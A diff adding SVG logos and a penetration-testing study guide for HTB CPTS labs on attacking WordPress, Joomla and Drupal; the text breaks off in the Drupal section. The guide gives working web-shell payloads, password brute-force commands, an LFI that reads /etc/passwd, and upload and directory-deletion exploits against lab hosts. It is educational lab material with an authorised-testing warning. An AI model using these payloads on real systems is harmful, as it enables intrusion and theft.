0-0.1698-0.057-0.3019-0.17-0.3774-0.113-0.0849-0.292-0.1415-0.565-0.1415-0.217 0-0.368 0.01887-0.518 0.04717v1.83h0.292v-0.783zm0-0.8491c0.047-0.00943 0.113-0.01886 0.207-0.01886 0.33 0 0.443 0.1604 0.443 0.3208 0 0.2264-0.208 0.3113-0.443 0.3113h-0.207v-0.6132z" fill="#0C1724"/> +</svg> diff --git a/public/diagrams/attacking-common-applications/tomcat.svg b/public/diagrams/attacking-common-applications/tomcat.svg @@ -0,0 +1 @@ +<svg xmlns="http://www.w3.org/2000/svg" width="595.279" height="424" viewBox="0 209.445 595.279 424" xmlns:v="https://vecta.io/nano"><path fill="#d1a41a" d="M531.64 594.445L437.037 493.74l-10.896 7.205c-52.431-30.908-91.661-75.49-111.786-142.345-71.662 17.629-155.214 62.845-209.047 124.013.01.012.021.023.03.037-53.459 57.869-87.91 112.324-97.033 132.129l52.169.334c-2.015-23.424 4.09-42.951 20-64.668 72.167-98.5 343.167 15 450.167 76.5l57-.5c-.001 0-8.501-37.5-56.001-32h0z"/><path fill="#ffdc76" d="M428.14 500.945c-110.127-54.949-140-189-113-281 0 0 20.5 9.5 40 55.5 44.646-12.799 96.667-14.001 142-1.5 0 0 5.5-36 38.5-53 4.992 21.339 38 191-107.5 280z"/><path d="M229.617 394.569L261.671 379l18.317 49.455-50.371-33.886zm-35.945 18.088l19.919-11.906 18.316 32.284-38.235-20.378zm-38.693 24.956l17.399-11.447 8.7 29.764-26.099-18.317zm308.172 82.424l-11.448-11.447-16.026 25.184 27.474-13.737zm22.896 27.474l-9.158-9.158-27.476 18.316 36.634-9.158zM315.64 346.862l-1.311-18.231 32.055 16.256-30.744 1.975zm10.139 26.644l-6.389-13.561 22.415 9.211-16.026 4.35zm210.638-19.233l4.578-13.736-25.185 10.531 20.607 3.205zm-9.158 27.933l2.289-11.219-18.316 5.495 16.027 5.724zm-222.086 35.488h59.985v7.419h-59.985v-7.419zm0-17.859h59.985v7.418h-59.985v-7.418zm183.163 17.859h59.985v7.419h-59.985v-7.419zm0-17.859h59.985v7.418h-59.985v-7.418z"/><path d="M547.277 286.323l-.1-.151c-.042-11.562-3.627-60.43-10.2-73.884-17.838 6.819-50.32 28.961-57.572 51.537-35.134-5.291-74.799-4.652-109.706 1.388-5.802-24.4-34.905-42.871-56.892-53.361-9.271 15.758-13.396 52.22-12.331 78.217-.039.027-.083.053-.122.083 4.08 108.774 57.119 176.502 126.478 217.549 71.4-41.047 122.399-121.09 120.358-221.427.029.017.061.031.087.049zM427.816 493.599c-109.027-54.727-129.652-193.147-111.064-266.803 5.168 28.505 14.552 46.291 34.905 54.957 18.88-5.445 40.823-8.739 63.263-9.765l16.179 37.412 11.968-37.497c20.707.828 40.93 3.638 58.645 8.554 18.698-13.683 26.066-34.662 29.919-52.906 4.94 21.254 4.375 67.272 4.397 67.272l.138-.755C538 384.597 492.189 456.66 427.817 493.601l-.001-.002z"/><path d="M583.444 607.021c-11.197-12.611-33.094-18.563-51.453-18.129-13.011-15.576-88.398-95.549-88.398-95.549l-5.235 6.613 91.12 98.51 3.943-.34c24.707-2.129 38.759 11.357 42.613 15.553 2.721 3.08 4.374 5.883 5.282 8.074h-50.093c-114.693-60.201-215.56-102.617-321.865-111.966.235-14.98 2.878-31.924 7.978-50.852l-9.838-2.691c-5.234 19.43-7.978 36.943-8.296 52.678a506.01 506.01 0 0 0-33.772-1.129c-9.61 0-18.361.898-26.294 2.463-10.403-10.467-19.266-20.434-26.746-29.873 49.64-51.994 131.692-99.197 202.865-116.527l-2.313-10.034c-76.612 18.585-160.479 69.095-207.171 118.124-21.669-29.418-30.373-53.59-32.866-71.833-3.218-23.032 2.26-44.239 15.866-61.343 21.307-26.68 51.453-28.505 82.731-23.26-.607 4.948.039 9.669 2.006 12.587 8.229 12.223 52.359 16.534 78.881 4.675-19.493-27.364-58.934-40.818-69.813-35.574-3.627 1.779-6.347 5.04-8.229 8.87-10.767-1.936-21.442-3.375-29.24-3.329-27.427.202-48.507 9.851-64.146 29.417-15.413 19.269-21.646 43.099-18.02 69.096 3.444 24.627 15.549 50.852 35.812 77.989l-9.768 10.764c-49.413 55.641-85.68 115.617-85.68 125.42v5.131h65.279l-1.144-6.088c-3.695-19.611 3.672-44.24 18.767-62.482 9.475-11.492 25.16-24.629 49.866-30.785 21.896 21.504 49.866 44.24 80.92 66.359h48.506v-5.131c0-5.793-2.855-10.855-8.023-14.275-7.662-5.039-19.493-5.746-30.373-2.012-10.358-11.605-16.185-27.137-17.431-46.291 105.398 9.395 206.038 52.221 319.597 111.967h62.559l-.002-4.063c-.997-12-8.38-20.736-8.38-20.736l-.002.002zM77.981 545.906c-15.458 18.768-23.573 43.557-21.76 64.764H14.968c8.273-17.992 41.254-70.008 89.759-122.686 6.71 8.348 14.167 16.762 22.372 25.313-23.801 7.229-39.666 20.66-49.413 32.609h.295zm288.822-221.515l-.003-.001-.002.005.005-.004z"/><path d="M507.276 325.238v-6.687c-24.772 0-39.609 9.799-46.707 30.68h-53.575c3.746-16.713 4.388-33.106-1.131-42.585-3.113-5.334-8.014-8.173-14.172-8.173-22.071 0-30.781 22.621-31.138 23.582l6.247 2.334c.249-.827 7.556-19.204 24.954-19.204 3.801 0 6.471 1.534 8.402 4.854 4.52 7.784 3.786 23.078.031 39.151h-30.451v6.686l28.959.027c-3.091 10.967-7.418 21.796-12.294 30.451l-1.578 2.771 38.235 24.04-21.477 14.15 3.687 5.586 24.041-15.821 25.871 16.895 3.549-5.652-24.04-14.86 37.777-24.499c-.013-.015-.02-.029-.029-.042l-.13-.076.043-.007c-7.92-11.674-10.417-21.655-7.123-32.962l31.219.041.067-6.64h-29.077c5.496-12.661 13.052-24.04 39.84-24.04h0zm-78.24 83.779l-28.16-17.744 55.178.014-27.018 17.73h0zm29.395-53.114c-2.381 7.555-1.419 18.935 4.419 28.619h-67.999c4.144-8.288 7.968-18.385 10.761-28.619h52.819z"/></svg> +\ No newline at end of file diff --git a/public/diagrams/attacking-common-applications/wordpress.svg b/public/diagrams/attacking-common-applications/wordpress.svg @@ -0,0 +1,68 @@ +<?xml version="1.0" encoding="utf-8"?> +<!-- Generator: Adobe Illustrator 15.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) --> +<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"> +<svg version="1.0" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="540px" + height="122.523px" viewBox="0 0 540 122.523" enable-background="new 0 0 540 122.523" xml:space="preserve"> +<g id="Layer_1"> +</g> +<g id="Layer_2"> + <g> + <path fill="#00749A" d="M313.19,48.227h-21.257v2.255c6.649,0,7.718,1.425,7.718,9.857V75.54c0,8.431-1.068,9.975-7.718,9.975 + c-5.105-0.712-8.55-3.444-13.3-8.669l-5.462-5.937c7.362-1.308,11.28-5.938,11.28-11.164c0-6.53-5.58-11.518-16.031-11.518h-20.9 + v2.255c6.649,0,7.718,1.425,7.718,9.857V75.54c0,8.431-1.069,9.975-7.718,9.975v2.256h23.631v-2.256 + c-6.649,0-7.718-1.544-7.718-9.975v-4.274h2.018l13.182,16.505h34.557c16.981,0,24.344-9.024,24.344-19.832 + C337.534,57.133,330.172,48.227,313.19,48.227z M263.434,67.582V51.79h4.868c5.343,0,7.719,3.681,7.719,7.956 + c0,4.157-2.376,7.837-7.719,7.837H263.434z M313.547,84.09h-0.832c-4.274,0-4.868-1.068-4.868-6.531V51.79c0,0,5.225,0,5.7,0 + c12.35,0,14.605,9.024,14.605,16.031C328.152,75.064,325.896,84.09,313.547,84.09z"/> + <path fill="#00749A" d="M181.378,71.978l8.194-24.227c2.376-7.006,1.307-9.024-6.293-9.024v-2.376h22.325v2.376 + c-7.481,0-9.262,1.781-12.231,10.45L179.834,89.79h-1.543l-12.114-37.17l-12.349,37.17h-1.544l-13.181-40.613 + c-2.85-8.669-4.75-10.45-11.638-10.45v-2.376h26.363v2.376c-7.007,0-8.908,1.662-6.413,9.024l7.956,24.227l11.994-35.627h2.257 + L181.378,71.978z"/> + <path fill="#00749A" d="M221.752,89.314c-13.062,0-23.75-9.618-23.75-21.376c0-11.637,10.689-21.257,23.75-21.257 + c13.063,0,23.75,9.62,23.75,21.257C245.502,79.696,234.815,89.314,221.752,89.314z M221.752,50.365 + c-10.924,0-14.725,9.855-14.725,17.574c0,7.839,3.801,17.576,14.725,17.576c11.045,0,14.845-9.737,14.845-17.576 + C236.597,60.22,232.797,50.365,221.752,50.365z"/> + <path fill="#464342" d="M366.864,85.396v2.375H339.67v-2.375c7.957,0,9.382-2.018,9.382-13.895V52.502 + c0-11.877-1.425-13.776-9.382-13.776v-2.376h24.581c12.231,0,19.002,6.294,19.002,14.727c0,8.194-6.771,14.606-19.002,14.606 + h-6.769v5.817C357.482,83.378,358.907,85.396,366.864,85.396z M364.251,40.625h-6.769v20.664h6.769 + c6.651,0,9.738-4.631,9.738-10.212C373.989,45.377,370.902,40.625,364.251,40.625z"/> + <path fill="#464342" d="M464.833,76.609l-0.594,2.137c-1.068,3.919-2.376,5.344-10.807,5.344h-1.663 + c-6.174,0-7.243-1.425-7.243-9.856v-5.462c9.263,0,9.976,0.83,9.976,7.006h2.256V58.083h-2.256c0,6.175-0.713,7.006-9.976,7.006 + V51.79h6.53c8.433,0,9.738,1.425,10.807,5.344l0.595,2.255h1.899l-0.83-11.162h-34.914v2.255c6.649,0,7.719,1.425,7.719,9.857 + V75.54c0,7.713-0.908,9.656-6.151,9.933c-4.983-0.761-8.404-3.479-13.085-8.627l-5.463-5.937 + c7.363-1.308,11.282-5.938,11.282-11.164c0-6.53-5.581-11.518-16.031-11.518h-20.9v2.255c6.649,0,7.718,1.425,7.718,9.857V75.54 + c0,8.431-1.068,9.975-7.718,9.975v2.256h23.632v-2.256c-6.649,0-7.719-1.544-7.719-9.975v-4.274h2.019l13.181,16.505h48.806 + l0.713-11.161H464.833z M401.896,67.582V51.79h4.868c5.344,0,7.72,3.681,7.72,7.956c0,4.157-2.376,7.837-7.72,7.837H401.896z"/> + <path fill="#464342" d="M488.939,89.314c-4.75,0-8.907-2.493-10.688-4.038c-0.594,0.595-1.662,2.376-1.899,4.038h-2.257V72.928 + h2.375c0.951,7.837,6.412,12.468,13.419,12.468c3.8,0,6.888-2.137,6.888-5.699c0-3.087-2.731-5.463-7.6-7.719l-6.769-3.206 + c-4.751-2.258-8.313-6.177-8.313-11.401c0-5.7,5.344-10.568,12.707-10.568c3.919,0,7.243,1.425,9.263,3.087 + c0.593-0.475,1.187-1.782,1.544-3.208h2.256v14.014h-2.494c-0.832-5.582-3.919-10.213-10.212-10.213 + c-3.325,0-6.414,1.9-6.414,4.87c0,3.087,2.494,4.749,8.195,7.362l6.53,3.206c5.701,2.731,7.956,7.127,7.956,10.689 + C503.426,84.09,496.895,89.314,488.939,89.314z"/> + <path fill="#464342" d="M525.514,89.314c-4.751,0-8.908-2.493-10.688-4.038c-0.594,0.595-1.662,2.376-1.899,4.038h-2.257V72.928 + h2.375c0.95,7.837,6.412,12.468,13.419,12.468c3.8,0,6.888-2.137,6.888-5.699c0-3.087-2.731-5.463-7.601-7.719l-6.769-3.206 + c-4.75-2.258-8.313-6.177-8.313-11.401c0-5.7,5.344-10.568,12.707-10.568c3.919,0,7.243,1.425,9.263,3.087 + c0.593-0.475,1.187-1.782,1.542-3.208h2.257v14.014h-2.493c-0.832-5.582-3.919-10.213-10.212-10.213 + c-3.325,0-6.414,1.9-6.414,4.87c0,3.087,2.494,4.749,8.195,7.362l6.53,3.206c5.701,2.731,7.956,7.127,7.956,10.689 + C540,84.09,533.469,89.314,525.514,89.314z"/> + <g> + <path fill="#464342" d="M8.708,61.26c0,20.802,12.089,38.779,29.619,47.298L13.258,39.872 + C10.342,46.408,8.708,53.641,8.708,61.26z"/> + <path fill="#464342" d="M96.74,58.608c0-6.495-2.333-10.993-4.334-14.494c-2.664-4.329-5.161-7.995-5.161-12.324 + c0-4.831,3.664-9.328,8.825-9.328c0.233,0,0.454,0.029,0.681,0.042c-9.35-8.566-21.807-13.796-35.489-13.796 + c-18.36,0-34.513,9.42-43.91,23.688c1.233,0.037,2.395,0.063,3.382,0.063c5.497,0,14.006-0.667,14.006-0.667 + c2.833-0.167,3.167,3.994,0.337,4.329c0,0-2.847,0.335-6.015,0.501L48.2,93.547l11.501-34.493l-8.188-22.434 + c-2.83-0.166-5.511-0.501-5.511-0.501c-2.832-0.166-2.5-4.496,0.332-4.329c0,0,8.679,0.667,13.843,0.667 + c5.496,0,14.006-0.667,14.006-0.667c2.835-0.167,3.168,3.994,0.337,4.329c0,0-2.853,0.335-6.015,0.501l18.992,56.494 + l5.242-17.517C95.011,68.328,96.74,63.107,96.74,58.608z"/> + <path fill="#464342" d="M62.184,65.857l-15.768,45.819c4.708,1.384,9.687,2.141,14.846,2.141c6.12,0,11.989-1.058,17.452-2.979 + c-0.141-0.225-0.269-0.464-0.374-0.724L62.184,65.857z"/> + <path fill="#464342" d="M107.376,36.046c0.226,1.674,0.354,3.471,0.354,5.404c0,5.333-0.996,11.328-3.996,18.824l-16.053,46.413 + c15.624-9.111,26.133-26.038,26.133-45.426C113.815,52.124,111.481,43.532,107.376,36.046z"/> + <path fill="#464342" d="M61.262,0C27.483,0,0,27.481,0,61.26c0,33.783,27.483,61.263,61.262,61.263 + c33.778,0,61.265-27.48,61.265-61.263C122.526,27.481,95.04,0,61.262,0z M61.262,119.715c-32.23,0-58.453-26.223-58.453-58.455 + c0-32.23,26.222-58.451,58.453-58.451c32.229,0,58.45,26.221,58.45,58.451C119.712,93.492,93.491,119.715,61.262,119.715z"/> + </g> + </g> +</g> +</svg> diff --git a/src/content/sheets/pentest-workflow/attacking-common-applications-guide.md b/src/content/sheets/pentest-workflow/attacking-common-applications-guide.md @@ -0,0 +1,1078 @@ +--- +title: "Attacking Common Applications — Full Guide" +description: "Detailed CPTS walkthrough for footprinting and exploiting common apps: WordPress, Joomla, Drupal, Tomcat, Jenkins, Splunk, PRTG, osTicket, GitLab, CGI/Shellshock, thick clients, ColdFusion, IIS tilde, LDAP injection, mass assignment, and connection-string recovery." +category: pentest-workflow +subcategory: "Companion Guides" +order: 24 +tags: ["htb", "cpts", "attacking-common", "applications", "wordpress", "joomla", "drupal", "tomcat", "jenkins", "splunk", "prtg", "osticket", "gitlab", "shellshock", "coldfusion", "iis", "ldap", "thick-client", "pentest-workflow"] +tools: ["nmap", "eyewitness / aquatone / httpx", "wpscan", "droopescan", "gobuster / feroxbuster / ffuf", "metasploit", "msfvenom", "curl / searchsploit", "dnSpy / de4dot / x64dbg / gdb-peda", "iis_shortname_scanner", "ldapsearch", "nxc / crackmapexec", "burp suite"] +difficulty: intermediate +updated: "2026-09-15" +source: "vault:HackTheBox/Academy/CPTS Path/24-Attacking-Common-Applications" +--- + +[← Condensed cheat sheet](/sheets/pentest-workflow/attacking-common-applications) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Web enum deep-dive](/sheets/pentest-workflow/web-enumeration-and-exploitation) + +# Attacking Common Applications — Full Guide `fas:ClipboardList` + +> [!dashboard] What this is +> The long-form companion to the [Attacking Common Applications cheat sheet](/sheets/pentest-workflow/attacking-common-applications). The cheat sheet is the card you keep open during a box; this guide is the walkthrough that explains *why* each step works, section by section, across the whole CPTS module. Reach for the cheat sheet mid-engagement and this guide when you're learning the material or writing it up. + +Off-the-shelf applications are the softest part of most networks. A company patches its OS fleet and hardens AD, then leaves a Tomcat manager on `tomcat:tomcat`, a Splunk trial that quietly lost its login, or a WordPress plugin that hasn't shipped a fix since 2016. These apps sit on both the perimeter and the internal network, and one weak credential or forgotten install is often the whole foothold. + +Every target in this module answers to the same loop, so learn the loop rather than memorising eleven separate exploits: + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A["Sweep web ports\n80,443,8000,8080,8180,8500,8009,8089,10000"] --> B["Fingerprint app + exact version\n(headers, generator meta, changelog,\ndefault paths, favicon)"] + B --> C["Reach the admin/management console\n(default creds → weak-password spray → OSINT)"] + C --> D{"Turn access into code execution"} + D --> E["Built-in feature:\ntheme/template editor, script console,\nWAR/app/plugin upload, notification exec"] + D --> F["Version-specific CVE\n(traversal, unauth upload, deserialisation)"] + E --> G["Shell as the service account\n(often SYSTEM or root)"] + F --> G + G --> H["Loot creds → pivot →\nlocal privilege escalation"] +``` + +> [!danger] Authorised testing only +> Every technique below is full exploitation — unauth RCE, credential theft, backdoored uploads. Run it only against systems you are explicitly authorised to test (a lab, a signed engagement). Three things to keep honest on a real assessment: +> 1. **Admin-console RCE plants a live backdoor.** A web shell in `404.php`, an uploaded WAR, a malicious Splunk app — each is a real backdoor on a real box. Track every artefact you drop, its full path, and remove it at cleanup. +> 2. **Some chains are destructive.** Joomla's CVE-2019-10945 can *delete* directories; Drupalgeddon writes to the database. Prefer read-only proof where you can. +> 3. **OSINT and breach-data lookups touch third parties.** Keep them inside the rules of engagement. + +> [!success]+ Landing a shell — implant + hand-off +> `fas:Spider` +> Match the web-shell language to the server, then hand off to the right privesc guide: +> - **PHP** (WordPress, Joomla, Drupal, osTicket): drop [rp-shell.php](/downloads/pentest-workflow/rp-shell.php) or a one-line `system($_GET[...])`. +> - **JSP** (Tomcat, ColdFusion-on-Java): package [rp-shell.jsp](/downloads/pentest-workflow/rp-shell.jsp) as a WAR. +> - **ASP/ASPX** (IIS): VBScript → `.asp`, C# → `.aspx`. Cross the wires and IIS answers `Server Error in '/' Application`. +> - **Windows app host** (IIS, PRTG, Jenkins-on-Windows, ColdFusion): [Windows PrivEsc](/sheets/pentest-workflow/windows-privesc-cpts) — service accounts here almost always hold `SeImpersonatePrivilege`. +> - **Linux app host** (WordPress, Drupal, GitLab, Splunk, CGI): [Linux PrivEsc](/sheets/pentest-workflow/linux-privesc-cpts). +> Full shell catalogue and handler notes: [Web Shells](/sheets/pentest-workflow/web-shells). + +--- + +## 1 · Application discovery at scale `fas:Terminal` + +Browsing every `IP:port` by hand does not scale past a handful of hosts. The workable approach is two Nmap passes feeding a screenshotter, so a wall of open ports becomes a ranked list of applications worth opening. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A[Scope list] --> B["Fast web-port sweep\n(-p 80,443,8000,8080,8180,8888,10000)"] + B --> C["Targeted -sV on responders\n(this is what names Splunk/PRTG)"] + C --> D["Screenshot triage\nEyeWitness / Aquatone / gowitness"] + D --> E["Review high-value hits first\n(dev/qa/acc vhosts on top)"] + E --> F[Per-app footprint + exploit] +``` + +Lab exercises with FQDN vhosts need `/etc/hosts` entries first, since every vhost resolves to the one spawned IP: + +```bash +IP=10.129.42.195 +printf "%s\t%s\n" "$IP" "app.inlanefreight.local dev.inlanefreight.local blog.inlanefreight.local" | sudo tee -a /etc/hosts +``` + +Sweep the scope for the ports web apps and their management consoles live on, writing all three Nmap formats so the XML can feed a screenshotter: + +```bash +sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list +``` + +`--open` drops closed/filtered noise; `-oA` writes `.nmap/.gnmap/.xml`; `-iL` reads targets from a file. Then run version detection on anything that answered — this is the step that turns "http on a weird port" into "Splunkd on 8000, PRTG on 8080": + +```bash +sudo nmap --open -sV 10.129.201.50 +``` + +``` +80/tcp open http Microsoft IIS httpd 10.0 +8000/tcp open http Splunkd httpd +8080/tcp open http Indy httpd 17.3.33.2830 (Paessler PRTG bandwidth monitor) +8089/tcp open ssl/http Splunkd httpd (free license; remote login disabled) +``` + +Feed the XML to a screenshotter and review the report — high-value targets surface first, and identical default landing pages cluster together so you can skip a fleet of clones: + +```bash +# EyeWitness (Selenium-driven, ships on Kali) +eyewitness --web -x web_discovery.xml -d inlanefreight_eyewitness + +# Aquatone (pipe the same Nmap XML) +cat web_discovery.xml | ./aquatone -nmap +``` + +> [!tip]+ Modern triage — httpx + nuclei +> `fas:Lightbulb` +> EyeWitness and Aquatone still work and still ship on Kali, but the Go tooling is faster and better maintained. `httpx -screenshot` probes and fingerprints huge lists quickly and pipes straight into `nuclei` for follow-on scanning; `gowitness` is a headless-Chrome screenshotter that sets up in seconds. Fold Splunk's `Splunkd httpd`, PRTG's `Indy httpd`, and Tomcat's `Server` banner into a `nuclei` fingerprint pass across the whole scope. + +> [!info] Flag the non-prod vhosts first +> Hostnames with `dev`, `qa`, `acc`, `stage`, or `test` are patched last and gated loosest — verbose errors, debug modes, half-finished features. When the screenshot report lists a dozen sites, start there. + +--- + +## 2 · WordPress `fas:Terminal` — PHP, port 80 + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/wordpress.svg" alt="WordPress logo" style="height:54px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>WordPress · world's most common CMS</span></figcaption> +</figure> + +WordPress runs roughly a third of the web, so it turns up on almost every external test. The risk lives in its ~50k-plugin ecosystem, not in core — over half of known WordPress CVEs are plugin or theme bugs. Two reliable routes to code execution: brute an admin login and use the built-in Theme Editor, or exploit a vulnerable plugin directly. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Footprint: robots.txt,\npage source, wp-admin redirect"] --> B[Enumerate plugins/themes/users] + B --> C{WPScan + manual review} + C -->|Weak admin creds| D["XML-RPC / wp-login brute force"] + D --> E["Appearance → Theme Editor →\nedit 404.php of an inactive theme"] + E --> F["system($_GET[...]) web shell"] + C -->|Vulnerable plugin| G["Direct exploit\n(mail-masta LFI, wpDiscuz upload)"] + F --> H[www-data shell] + G --> H +``` + +**Footprint.** The `wp-admin`/`wp-content` paths (also in `robots.txt`) are the fastest tell — hitting `/wp-admin` redirects to `wp-login.php`. Grepping the homepage source reveals the active theme, every enqueued plugin, and each version string: + +```bash +curl -s http://blog.inlanefreight.local | grep -Ei 'wordpress|themes|plugins' +# <meta name="generator" content="WordPress 5.8" /> +# ...wp-content/themes/transport-gravity/... ?ver=5.8 +``` + +A directory listing on `wp-content/plugins/<plugin>/` often exposes a `readme.txt` that pins the exact plugin version for a CVE lookup. WordPress's default login also leaks valid usernames: "unknown user" and "wrong password" produce different errors — an enumeration oracle WPScan drives with `--enumerate u`. + +**Enumerate with WPScan.** An API token cross-references identified versions against the live vuln database (free tier: 75 requests/day): + +```bash +sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token <TOKEN> +# --enumerate with no arg = plugins, themes, users, media, backups +# --enumerate ap = all plugins · --enumerate u = users +``` + +> [!warning] Scanners and manual review are complementary +> In the module's own run, WPScan corrected the theme guess and found a second user (`john`) — but *missed* two plugins (wpDiscuz, Contact Form 7) that a plain `curl | grep` caught. Always do both. `waybackurls` can also surface plugin paths that were unlinked but never deleted from disk — exactly what left mail-masta exploitable. + +**Brute force over XML-RPC.** `xmlrpc.php` accepts many login attempts per request, so it is far faster than hammering `wp-login.php`: + +```bash +sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local +# [SUCCESS] - john / firebird1 +``` + +**RCE via the Theme Editor.** Any Administrator can edit theme PHP in the browser — admin is effectively RCE. Edit an *inactive* theme so you don't break the live site, and use an unguessable parameter name so a passer-by can't reuse your shell: + +```php +// Appearance → Theme Editor → Twenty Nineteen → 404.php +system($_GET[0]); +``` +```bash +curl "http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id" +# uid=33(www-data) gid=33(www-data) groups=33(www-data) +``` + +The whole flow is automated by `exploit/unix/webapp/wp_admin_shell_upload` (uploads a malicious plugin carrying a PHP Meterpreter, then self-cleans on session close). + +**Vulnerable plugins, no login needed.** + +```bash +# mail-masta — unauthenticated LFI (pl= goes straight into include()) +curl -s "http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" + +# wpDiscuz CVE-2020-24186 — client-side-only MIME check → PHP upload +python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1 +curl -s "http://blog.inlanefreight.local/wp-content/uploads/2021/08/<uploaded>.php?cmd=id" +``` + +--- + +## 3 · Joomla `fas:Terminal` — PHP/MySQL + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/joomla.svg" alt="Joomla logo" style="height:58px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Joomla · PHP/MySQL CMS</span></figcaption> +</figure> + +Third-most-used CMS. Unlike WordPress, the login returns a generic error for any wrong field, so username enumeration doesn't work — footprinting leans on files, and brute forcing targets the known `admin` account with a password list. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Footprint: generator meta,\nREADME.txt, robots.txt"] --> B["Version: joomla.xml, cache.xml"] + B --> C[droopescan / JoomlaScan] + C --> D{Admin access?} + D -->|Weak/default admin| E["Templates → Customise → error.php"] + E --> F["system($_GET[...]) web shell"] + D -->|No admin| G["CVE-2019-10945 traversal\n(auth; also deletes files)"] +``` + +**Footprint and version.** The `generator` meta tag, `robots.txt` (references `/administrator/`), and `README.txt` are the quick tells. Two XML files leak the exact version when readable: + +```bash +curl -s http://dev.inlanefreight.local/ | grep Joomla +curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format - +# <version>3.9.4</version> (also plugins/system/cache/cache.xml) +``` + +`whatweb` is a fast passive cross-check. `droopescan` has only light Joomla support — expect useful paths, not a full plugin list: + +```bash +droopescan scan joomla --url http://dev.inlanefreight.local/ +``` + +> [!tip] JoomlaScan is Python 2.7 and effectively abandoned +> It still runs but treat it as supplementary. There's no drop-in successor with the same feature set — `droopescan` plus manual `curl`/`whatweb` is the more reliable Joomla combination now. + +**Brute the admin login** (generic error → spray passwords against `admin`): + +```bash +sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin +# Success: admin:admin +``` + +**RCE via the template Customise editor** — same idea as WordPress's Theme Editor: + +```php +// Configuration → Templates → protostar → Customise → error.php +system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); +``` +```bash +curl -s "http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id" +``` + +**Pre-/post-auth fallback — CVE-2019-10945** (core 1.5.0–3.9.4): an authenticated directory traversal that lists and *deletes* arbitrary directories. Useful when the admin portal isn't externally reachable but you have a session another way. File deletion is destructive — avoid it on a live assessment. + +```bash +python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir / +``` + +--- + +## 4 · Drupal `fas:Terminal` + +<figure class="diagram-plate corners" style="max-width:fit-content;margin-block:1.1rem"> + <span class="diagram-plate__image" style="display:flex;justify-content:center;min-width:200px"> + <img src="/diagrams/attacking-common-applications/drupal.svg" alt="Drupal Druplicon logo" style="height:66px;width:auto" loading="lazy" decoding="async" /> + </span> + <figcaption><span>Drupal · the Druplicon</span></figcaption> +</figure> + +Smaller share overall but common in government and higher-ed. Its content model — every item is a "node" at `/node/<id>` — is a fingerprint on its own. Admin access alone isn't instant RCE here: you enable the PHP Filter module, upload a backdoored module, or use one of the three Drupalgeddon CVEs. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + A["Footprint: 'Powered by Drupal',\nCHANGELOG.txt, /node/<id>"] --> B[droopescan: version + modules] + B --> C{Admin access?} + C -->|Drupal 7| D["Enable PHP Filter module\n→ Basic page with PHP code"] + C -->|Drupal 8+| E["Install PHP Filter manually,\nthen as above"] + C -->|Any version| F["Upload backdoored module\n(shell.php + .htaccess)"] + C -->|No admin| G["Drupalgeddon SQLi\n→ rogue admin"] + G --> D + D --> H[www-data shell] + E --> H + F --> H +``` + +**Footprint.** `Powered by Drupal`, the Drupal logo, `CHANGELOG.txt`/`README.txt`, and `/node/<id>` URIs. Newer versions block `CHANGELOG.txt`, so a 404 there doesn't rule Drupal out — fall back to droopescan, which has mature Drupal support: + +```bash +curl -s http://drupal.inlanefreight.local | grep -i drupal +curl -s http://drupal-acc.inlanefreight.local/CHANGELOG.txt | grep -m2 "" # Drupal 7.57, 2018-02-21 +droopescan scan drupal -u http://drupal.inlanefreight.local +``` + +**RCE — PHP Filter module (Drupal 7).** Ships with core but disabled. Enable it, then create a Basic page with the "PHP code" text format: + +```php +<?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?> +``` +```bash +curl -s 